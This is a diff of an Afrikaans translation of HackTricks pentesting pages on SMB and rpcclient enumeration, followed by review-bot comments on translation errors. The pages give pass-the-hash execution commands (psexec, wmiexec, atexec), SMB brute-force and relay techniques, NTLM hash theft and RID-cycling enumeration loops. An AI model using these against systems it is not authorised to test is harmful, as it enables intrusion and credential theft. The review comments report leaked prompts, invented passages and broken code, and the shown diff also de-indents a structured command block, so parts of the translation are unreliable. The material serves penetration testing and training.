@@ -455,164 +460,153 @@ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ psexec \\192.168.122.66 -u Administrator -p 123456Ww psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash ``` - -Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** +Met behulp van die **parameter** `-k` kan jy teen **kerberos** geverifieer word in plaas van **NTLM**. ### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec -Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ -In **kali** it is located on /usr/share/doc/python3-impacket/examples/ - +Voer stiekem 'n opdragvenster uit sonder om die skyf aan te raak of 'n nuwe diens te laat loop deur gebruik te maak van DCOM via **poort 135**.\ +In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/ ```bash #If no password is provided, it will be prompted ./wmiexec.py [[domain/]username[:password]@] #Prompt for password ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` - -Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** - +Deur die **parameter** `-k` te gebruik, kan jy geverifieer word teen **kerberos** in plaas van **NTLM**. 
```bash #If no password is provided, it will be prompted ./dcomexec.py [[domain/]username[:password]@] ./dcomexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash #You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted ``` - ### [AtExec](../windows-hardening/ntlm/atexec.md) -Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ -In **kali** it is located on /usr/share/doc/python3-impacket/examples/ - +Voer opdragte uit via die Taakbeplanner (deur gebruik te maak van _\pipe\atsvc_ via SMB).\ +In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/ ```bash ./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` - -## Impacket reference +## Impacket verwysing [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/) -## **Bruteforce users credentials** - -**This is not recommended, you could block an account if you exceed the maximum allowed tries** +## **Bruteforce gebruikerslegitimasie** +**Dit word nie aanbeveel nie, jy kan 'n rekening blokkeer as jy die maksimum toegelate pogings oorskry** ```bash nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name ``` +## SMB-relay aanval -## SMB relay attack +Hierdie aanval maak gebruik van die Responder toolkit om SMB-outentiseringsessies op 'n interne netwerk vas te vang en dit na 'n teikermasjien te stuur. 
As die outentiseringsessie suksesvol is, sal dit jou outomaties in 'n stelsel-skulp laat val.\ +[**Meer inligting oor hierdie aanval hier.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) -This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ -[**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) +## SMB-Valstrik -## SMB-Trap +Die Windows-biblioteek URLMon.dll probeer outomaties outentiseer na die gasheer wanneer 'n bladsy probeer om toegang tot sekere inhoud te verkry via SMB, byvoorbeeld: `img src="\\10.10.10.10\path\image.jpg"` -The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"` - -This happens with the functions: +Dit gebeur met die funksies: * URLDownloadToFile * URLDownloadToCache * URLOpenStream * URLOpenBlockingStream -Which are used by some browsers and tools (like Skype) +Wat deur sommige webblaaier en gereedskap (soos Skype) gebruik word. 
-![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) +![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) -### SMBTrap using MitMf +### SMB-Valstrik met behulp van MitMf -![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) +![Van: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) -## NTLM Theft +## NTLM-diefstal -Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). +Soortgelyk aan SMB-valstrik, kan die plant van skadelike lêers op 'n teikersisteem (via SMB, byvoorbeeld) 'n SMB-outentiseringspoging uitlok, wat die NetNTLMv2-hash toelaat om onderskep te word met 'n hulpmiddel soos Responder. Die hash kan dan offline gekraak word of gebruik word in 'n [SMB-relay aanval](pentesting-smb.md#smb-relay-attack). -[See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) - -## HackTricks Automatic Commands +[Sien: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) +## HackTricks Outomatiese Opdragte ``` Protocol_Name: SMB #Protocol Abbreviation if there is one. Port_Number: 137,138,139 #Comma separated if there is more than one. Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for SMB - Note: | - While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. 
Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. +Name: Notes +Description: Notes for SMB +Note: | +While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network. - #These are the commands I run in order every time I see an open SMB port +#These are the commands I run in order every time I see an open SMB port - With No Creds - nbtscan {IP} - smbmap -H {IP} - smbmap -H {IP} -u null -p null - smbmap -H {IP} -u guest - smbclient -N -L //{IP} - smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 - rpcclient {IP} - rpcclient -U "" {IP} - crackmapexec smb {IP} - crackmapexec smb {IP} --pass-pol -u "" -p "" - crackmapexec smb {IP} --pass-pol -u "guest" -p "" - GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all - GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat - GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" - getArch.py -target {IP} +With No Creds +nbtscan {IP} +smbmap -H {IP} +smbmap -H {IP} -u null -p null +smbmap -H {IP} -u guest +smbclient -N -L //{IP} +smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 +rpcclient {IP} +rpcclient -U "" {IP} +crackmapexec smb {IP} +crackmapexec smb {IP} --pass-pol -u "" -p "" +crackmapexec smb {IP} --pass-pol -u "guest" -p "" +GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all +GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat +GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" +getArch.py -target {IP} - With 
Creds - smbmap -H {IP} -u {Username} -p {Password} - smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} - smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` - crackmapexec smb {IP} -u {Username} -p {Password} --shares - GetADUsers.py {Domain_Name}/{Username}:{Password} -all - GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat - GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request +With Creds +smbmap -H {IP} -u {Username} -p {Password} +smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} +smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` +crackmapexec smb {IP} -u {Username} -p {Password} --shares +GetADUsers.py {Domain_Name}/{Username}:{Password} -all +GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat +GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request - https://book.hacktricks.xyz/pentesting/pentesting-smb +https://book.hacktricks.xyz/pentesting/pentesting-smb Entry_2: - Name: Enum4Linux - Description: General SMB Scan - Command: enum4linux -a {IP} +Name: Enum4Linux +Description: General SMB Scan +Command: enum4linux -a {IP} Entry_3: - Name: Nmap SMB Scan 1 - Description: SMB Vuln Scan With Nmap - Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP} +Name: Nmap SMB Scan 1 +Description: SMB Vuln Scan With Nmap +Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP} Entry_4: - Name: Nmap Smb Scan 2 - Description: SMB Vuln Scan With Nmap (Less Specific) - Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP} +Name: Nmap Smb Scan 2 +Description: SMB Vuln Scan With Nmap (Less Specific) +Command: nmap --script 'smb-vuln*' 
-Pn -p 139,445 {IP} Entry_5: - Name: Hydra Brute Force - Description: Need User - Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb - -Entry_6: - Name: SMB/SMB2 139/445 consolesless mfs enumeration - Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' - -``` +Name: Hydra Brute Force +Description: Need User +Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb +Entry_6: +Name: SMB/SMB2 139/445 consolesless mfs enumeration +Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' + +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
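Review bot: In hunk `@@ -161,51 +146,69 @@` the translation prompt itself leaked into the document: the "Oneliner" label was replaced by the paragraph beginning "Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/network-services-pentesting/pentesting-smb.md. Vertaal die relevante Engelse teks na Afrikaans ..." and ending "... behalwe die vertaling en markdown-sintaksis nie." That text must go and the "Oneliner" label restored before the `for i in $(seq 500 1100)` block. The same hunk also adds an invented walkthrough under "Metasploit - Enumereer plaaslike gebruikers" ("Hierdie module in Metasploit word gebruik ...", "#### Gebruik", `use auxiliary/scanner/smb/smb_enumusers`, `set RHOSTS` / `set SMBUser` / `set SMBPass`, `run`, "Die module sal dan begin ...") that has no counterpart on the `-` side and names a different module (smb_enumusers) from the retained command block, which uses `use auxiliary/scanner/smb/smb_lookupsid`. Drop the added text so the section is the heading plus the original smb_lookupsid block, as in the English source.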
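Review bot: Hunk `@@ -219,9 +222,28 @@` inserts a three-step tutorial under "Verbind/Lys 'n gedeelde vouer" (from "Om 'n gedeelde vouer aan te sluit of te lys, kan jy die volgende stappe volg:" through "Dit is belangrik om te onthou dat jy die nodige toegangsregte moet hê ...") that is not a translation of anything on the `-` side; the source has only the heading followed by the `#Connect using smbclient` code block. Remove the added steps and their inline fence (`smbclient /// -U`) so the heading sits directly above the original block again.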
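Review bot: Hunk `@@ -233,12 +255,11 @@` renders SMB "shares" as "aandele" ("Handmatig ondersoek van Windows-aandele", "Gewone aandele name vir Windows teikens"), which is the financial sense of the word, while the rest of this file uses "gedeelde vouers", "gedeeltes" and, later, the untranslated "shares" ("Spesiaal interessant vanaf shares ..."). Pick one term for the whole file (either "gedeelde vouers" or simply keep "share", which the translation brief already exempts as a technical word) and apply it consistently in this hunk and in `@@ -249,17 +270,14 @@` ("Gewone aandele name van ...").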
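Review bot: Hunk `@@ -267,27 +285,23 @@` changes code that should have been left alone: the body of the `for share in ${shares[*]}` loop lost its indentation (`output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')`, `if [[ -z $output ]]; then`, both `echo` lines and `fi` now start in column 0). The script still runs, but the translation brief says code is not to be touched, so restore the original leading whitespace. While this block is being edited, the unchanged context line `#/bin/bash` is missing the `!` of the shebang (`#!/bin/bash`); it is pre-existing, but worth fixing in the same PR.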
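Review bot: Hunk `@@ -297,38 +311,41 @@` replaces the bare label "CMD console" with a fabricated paragraph and list ("Die CMD-konsole is 'n opdraggewer-venster ...", `ipconfig`, `ping`, `nslookup`, `netstat`, `tasklist`, `net user`, "Dit is net 'n paar voorbeelde ...") that does not exist in the English source and has nothing to do with listing shares. Keep only the translated label "CMD-konsole" so it introduces the `net share` / `net view \\ /all` block exactly as "CMD console" did.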
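Review bot: Hunk `@@ -343,83 +360,73 @@` translates identifiers that are literal commands and options, which breaks them: the smbclient interactive commands `mask`, `recurse` and `prompt` in the "Opdragte:" list became "masker", "rekursie" and "vra" (only `mget` survived), and the CrackMapExec options became `-M spinnekop_plus [--share ]` and `--patroon txt` although the command two lines below still correctly reads `-M spider_plus`. Restore `mask`, `recurse`, `prompt`, `spider_plus` and `--pattern` verbatim. The two CrackMapExec bullets also lost their nesting (`  * ` became `* `), so they now read as siblings of the CrackMapExec link instead of its sub-items. Smaller issues in the same hunk: "geautehtiseerde" in the SYSVOL hint should be "geoutentiseerde", "gidektores" in the `directory mask` row should be "gidse", and the `magic output` row says "toor skrip" while the row above keeps "magic script"; use one rendering.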
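Review bot: Hunk `@@ -441,13 +448,11 @@` strips all the emphasis from the psexec/smbexec paragraph: the `-` side bolds "create a new service", "execute something", "psexec", "upload", "smbexec" and "cmd.exe/powershell.exe", and the `+` line "Albei opsies sal 'n nuwe diens skep ..." keeps none of it, although the brief asks for identical markdown. Reapply the `**...**` spans, and tidy the trailing "--file-less tegniek-" so the dashes and emphasis match the original "--**file-less technique-**-" (or simply "(file-less tegniek)").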
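Review bot: Hunk `@@ -455,164 +460,153 @@` rewrites the contents of the "HackTricks Automatic Commands" fenced block, which must stay byte-identical: every nested line was de-indented (`- Name: Notes` became `Name: Notes`, the body of the `Note: |` block scalar, the command lines under `With No Creds` and `With Creds`, and the `Name`/`Description`/`Command` children of each `Entry_N:`), and the blank line separating `Entry_5` from `Entry_6` was dropped. Without the indentation the keys no longer nest under `Entry_N:` and the `|` scalar has no body, so the block no longer parses as the structured format the block's own `Note: sourced from https://github.com/carlospolop/legion` line points at. Revert the whole fenced block to the `-` side verbatim. Two typos elsewhere in the same hunk: "teikermasjien" in the SMB-relay paragraph should be "teikenmasjien", and "deur sommige webblaaier en gereedskap" should be "webblaaiers".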
diff --git a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md index 2ac735b55..a705a7749 100644 --- a/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md +++ b/network-services-pentesting/pentesting-smb/rpcclient-enumeration.md @@ -1,125 +1,123 @@ -# rpcclient enumeration +# rpcclient opsporing
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -### **What is a RID** +### **Wat is 'n RID** -### Overview of Relative Identifiers (RID) and Security Identifiers (SID) +### Oorsig van Relatiewe Identifiseerders (RID) en Sekuriteitsidentifiseerders (SID) -**Relative Identifiers (RID)** and **Security Identifiers (SID)** are key components in Windows operating systems for uniquely identifying and managing objects, such as users and groups, within a network domain. +**Relatiewe Identifiseerders (RID)** en **Sekuriteitsidentifiseerders (SID)** is sleutelkomponente in Windows-bedryfstelsels om unieke identifikasie en bestuur van voorwerpe, soos gebruikers en groepe, binne 'n netwerkdomein te verseker. -- **SIDs** serve as unique identifiers for domains, ensuring that each domain is distinguishable. -- **RIDs** are appended to SIDs to create unique identifiers for objects within those domains. This combination allows for precise tracking and management of object permissions and access controls. +- **SIDs** dien as unieke identifiseerders vir domeine, wat verseker dat elke domein onderskeibaar is. +- **RIDs** word by SIDs gevoeg om unieke identifiseerders vir voorwerpe binne daardie domeine te skep. 
Hierdie kombinasie maak noukeurige opsporing en bestuur van voorwerppermisies en toegangskontroles moontlik. -For instance, a user named `pepe` might have a unique identifier combining the domain's SID with his specific RID, represented in both hexadecimal (`0x457`) and decimal (`1111`) formats. This results in a complete and unique identifier for pepe within the domain like: `S-1-5-21-1074507654-1937615267-42093643874-1111`. +Byvoorbeeld, 'n gebruiker genaamd `pepe` kan 'n unieke identifiseerder hê wat die domein se SID met sy spesifieke RID kombineer, verteenwoordig in beide heksadesimale (`0x457`) en desimale (`1111`) formate. Dit lei tot 'n volledige en unieke identifiseerder vir pepe binne die domein soos: `S-1-5-21-1074507654-1937615267-42093643874-1111`. -### **Enumeration with rpcclient** +### **Opsporing met rpcclient** -The **`rpcclient`** utility from Samba is utilized for interacting with **RPC endpoints through named pipes**. Below commands that can be issued to the SAMR, LSARPC, and LSARPC-DS interfaces after a **SMB session is established**, often necessitating credentials. +Die **`rpcclient`** nut van Samba word gebruik om met **RPC-eindpunte deur middel van genoemde pype** te kommunikeer. Hieronder is opdragte wat uitgereik kan word na die SAMR, LSARPC en LSARPC-DS koppelvlakke nadat 'n **SMB-sessie opgestel** is, wat dikwels legitimasie vereis. -#### Server Information +#### Bedienerinligting -* To obtain **Server Information**: `srvinfo` command is used. +* Om **Bedienerinligting te verkry**: word die `srvinfo`-opdrag gebruik. -#### Enumeration of Users - -* **Users can be listed** using: `querydispinfo` and `enumdomusers`. -* **Details of a user** by: `queryuser <0xrid>`. -* **Groups of a user** with: `queryusergroups <0xrid>`. -* **A user's SID is retrieved** through: `lookupnames `. -* **Aliases of users** by: `queryuseraliases [builtin|domain] `. 
+#### Opsporing van Gebruikers +* **Gebruikers kan gelys word** deur gebruik te maak van: `querydispinfo` en `enumdomusers`. +* **Besonderhede van 'n gebruiker** deur: `queryuser <0xrid>`. +* **Groepe van 'n gebruiker** met: `queryusergroups <0xrid>`. +* **'n Gebruiker se SID word opgehaal** deur: `lookupnames `. +* **Aliases van gebruikers** deur: `queryuseraliases [builtin|domain] `. ```bash # Users' RIDs-forced for i in $(seq 500 1100); do - rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; +rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""; done # samrdump.py can also serve this purpose ``` +#### Opname van Groepe -#### Enumeration of Groups +* **Groepe** deur: `enumdomgroups`. +* **Besonderhede van 'n groep** met: `querygroup <0xrid>`. +* **Lede van 'n groep** deur: `querygroupmem <0xrid>`. -* **Groups** by: `enumdomgroups`. -* **Details of a group** with: `querygroup <0xrid>`. -* **Members of a group** through: `querygroupmem <0xrid>`. +#### Opname van Alias Groepe -#### Enumeration of Alias Groups +* **Alias groepe** deur: `enumalsgroups `. +* **Lede van 'n alias groep** met: `queryaliasmem builtin|domain <0xrid>`. -* **Alias groups** by: `enumalsgroups `. -* **Members of an alias group** with: `queryaliasmem builtin|domain <0xrid>`. +#### Opname van Domeine -#### Enumeration of Domains +* **Domeine** deur: `enumdomains`. +* **'n Domein se SID word opgehaal** deur: `lsaquery`. +* **Domein inligting word verkry** deur: `querydominfo`. -* **Domains** using: `enumdomains`. -* **A domain's SID is retrieved** through: `lsaquery`. -* **Domain information is obtained** by: `querydominfo`. +#### Opname van Shares -#### Enumeration of Shares +* **Alle beskikbare shares** deur: `netshareenumall`. +* **Inligting oor 'n spesifieke share word opgehaal** met: `netsharegetinfo `. -* **All available shares** by: `netshareenumall`. 
-* **Information about a specific share is fetched** with: `netsharegetinfo `. +#### Addisionele Operasies met SIDs -#### Additional Operations with SIDs +* **SIDs volgens naam** deur: `lookupnames `. +* **Meer SIDs** deur: `lsaenumsid`. +* **RID cycling om meer SIDs te kontroleer** word uitgevoer deur: `lookupsids `. -* **SIDs by name** using: `lookupnames `. -* **More SIDs** through: `lsaenumsid`. -* **RID cycling to check more SIDs** is performed by: `lookupsids `. +#### **Ekstra opdragte** -#### **Extra commands** - -| **Command** | **Interface** | **Description** | +| **Opdrag** | **Interface** | **Beskrywing** | | ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- | -| queryuser | SAMR | Retrieve user information | -| querygroup | Retrieve group information | | -| querydominfo | Retrieve domain information | | -| enumdomusers | Enumerate domain users | | -| enumdomgroups | Enumerate domain groups | | -| createdomuser | Create a domain user | | -| deletedomuser | Delete a domain user | | -| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values | -| lookupsids | Look up SIDs to usernames (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | -| lsaaddacctrights | Add rights to a user account | | -| lsaremoveacctrights | Remove rights from a user account | | -| dsroledominfo | LSARPC-DS | Get primary domain information | -| dsenumdomtrusts | Enumerate trusted domains within an AD forest | | +| queryuser | SAMR | Haal gebruikersinligting op | +| querygroup | Haal groepinligting op | | +| querydominfo | Haal domeininligting op | | +| 
enumdomusers | Tel domeingebruikers op | | +| enumdomgroups | Tel domeingroepe op | | +| createdomuser | Skep 'n domeingebruiker | | +| deletedomuser | Verwyder 'n domeingebruiker | | +| lookupnames | LSARPC | Soek gebruikersname na SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) waardes | +| lookupsids | Soek SIDs na gebruikersname (RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling) | | +| lsaaddacctrights | Voeg regte by 'n gebruikersrekening | | +| lsaremoveacctrights | Verwyder regte van 'n gebruikersrekening | | +| dsroledominfo | LSARPC-DS | Kry primêre domeininligting | +| dsenumdomtrusts | Tel vertroue domeine binne 'n AD-bos | | -To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](../135-pentesting-msrpc.md). +Om **beter te verstaan** hoe die gereedskap _**samrdump**_ **en** _**rpcdump**_ werk, moet jy [**Pentesting MSRPC**](../135-pentesting-msrpc.md) lees.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder hou jou aanvalsoppervlak dop, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegniese stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
